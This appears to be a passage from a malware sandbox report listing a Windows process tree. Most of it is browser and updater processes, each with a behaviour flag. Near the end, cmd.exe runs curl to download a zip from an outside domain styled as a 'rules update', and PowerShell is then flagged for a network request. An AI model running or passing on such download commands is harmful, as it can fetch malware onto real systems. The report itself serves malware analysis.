"C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=108.0.5359.125 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ff7ebd4fa48,0x7ff7ebd4fa58,0x7ff7ebd4fa68
4⤵
- Executes dropped EXE
PID:5028

C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
4⤵
- Executes dropped EXE
PID:2524

C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=108.0.5359.125 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ff7ebd4fa48,0x7ff7ebd4fa58,0x7ff7ebd4fa68
5⤵
- Executes dropped EXE
PID:3724

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler64.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NTMwNzE1ODUtODc5NC00QkE5LUI0OEQtMkZBMjlFM0RBRjY0fSIgdXNlcmlkPSJ7NjU0REYwNUQtMTA5Qi00ODk5LUE1MzctMDFGQTREM0E3RTQxfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezQ2ODg4NzUzLTlFMDUtNDlCQi1CRThCLUI3QjE2REFEQ0FGRH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iNCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTA4LjAuNTM1OS4xMjUiIGFwPSJ4NjQtc3RhYmxlLXN0YXRzZGVmXzEiIGxhbmc9ImVuIiBicmFuZD0iQ0hXTCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjQ2IiBpaWQ9InsyREQwQzZENy0xRjc0LUY4RTMtMjJFNS00NjUwMzcxNkY3OUN9IiBjb2hvcnQ9IjE6Z3UvaTE5OiIgY29ob3J0bmFtZT0iU3RhYmxlIEluc3RhbGxzICZhbXA7IFZlcnNpb24gUGlucyI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9lZGdlZGwubWUuZ3Z0MS5jb20vZWRnZWRsL3JlbGVhc2UyL2Nocm9tZS9ocHVha2tpNHIyazVsejRtdHg1YWk1Y2lieV8xMDguMC41MzU5LjEyNS8xMDguMC41MzU5LjEyNV9jaHJvbWVfaW5zdGFsbGVyLmV4ZSIgZG93bmxvYWRlZD0iOTI0MjM3MjAiIHRvdGFsPSI5MjQyMzcyMCIgZG93bmxvYWRfdGltZV9tcz0iNjk3OCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NjA5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNDA2IiBkb3dubG9hZF90aW1lX21zPSI4NDQxIiBkb3dubG9hZGVkPSI5MjQyMzcyMCIgdG90YWw9IjkyNDIzNzIwIiBpbnN0YWxsX3RpbWVfbXM9IjE0ODIwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateOnDemand.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateOnDemand.exe" -Embedding
1⤵
- Executes dropped EXE
PID:4256

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3520

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1316

C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe" --rename-chrome-exe --system-level --verbose-logging --channel=stable
2⤵
- Executes dropped EXE
PID:4988

C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=108.0.5359.125 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff69dacfa48,0x7ff69dacfa58,0x7ff69dacfa68
3⤵
- Executes dropped EXE
PID:4996

C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe" --channel=stable --delete-old-versions --system-level --verbose-logging
3⤵
- Executes dropped EXE
PID:228

C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\108.0.5359.125\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=108.0.5359.125 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff69dacfa48,0x7ff69dacfa58,0x7ff69dacfa68
4⤵
- Executes dropped EXE
PID:2852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd4bfe46f8,0x7ffd4bfe4708,0x7ffd4bfe4718
2⤵
PID:4544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
2⤵
PID:5016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
2⤵
PID:4924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
2⤵
PID:1360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4232 /prefetch:1
2⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1
2⤵
PID:2076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5636 /prefetch:8
2⤵
PID:4180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
2⤵
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5624 /prefetch:8
2⤵
PID:4676

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4384 /prefetch:8
2⤵
PID:5036

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
2⤵
PID:904

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff6b0995460,0x7ff6b0995470,0x7ff6b0995480
3⤵
PID:3452

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4384 /prefetch:8
2⤵
PID:2652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
2⤵
PID:460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
2⤵
PID:388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
2⤵
PID:1828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2160,17275488909688746818,15497575325078678025,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6096 /prefetch:8
2⤵
PID:3080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3796

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x344 0x394
1⤵
PID:1476

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5040

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2864

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.0.2085509234\402964472" -parentBuildID 20200403170909 -prefsHandle 1684 -prefMapHandle 1676 -prefsLen 1 -prefMapSize 220117 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 1744 gpu
3⤵
PID:1688

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.3.1585401272\286860393" -childID 1 -isForBrowser -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 112 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 2448 tab
3⤵
PID:5092

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2864.13.658675941\87891123" -childID 2 -isForBrowser -prefsHandle 3776 -prefMapHandle 3772 -prefsLen 6894 -prefMapSize 220117 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2864 "\\.\pipe\gecko-crash-server-pipe.2864" 3784 tab
3⤵
PID:3692

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /cr
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler.exe"
2⤵
- Executes dropped EXE
PID:3000

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler64.exe"
2⤵
- Executes dropped EXE
PID:1320

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource core
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:1096

C:\Windows\system32\curl.exe
curl https://indrani-therapy.com/rulesupdate/NewRules_GQD5.zip
2⤵
PID:5040

C:\Windows\system32\curl.exe
curl https://indrani-therapy.com/rulesupdate/NewRules_GQD5.zip
2⤵
PID:5068

C:\Windows\system32\curl.exe
curl http://indrani-therapy.com/rulesupdate/NewRules_GQD5.zip
2⤵
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=108.0.5359.125 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd391c7e68,0x7ffd391c7e78,0x7ffd391c7e88
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2396 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:4052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:2
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:4664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4456 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:3724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4800 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --mojo-platform-channel-handle=4992 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:2664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5424 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5452 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --mojo-platform-channel-handle=5800 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:4008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
- Executes dropped EXE
PID:2884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=6044 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:1
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4788 --field-trial-handle=2076,i,13010093242103879665,3073859929906635706,131072 /prefetch:8
2⤵
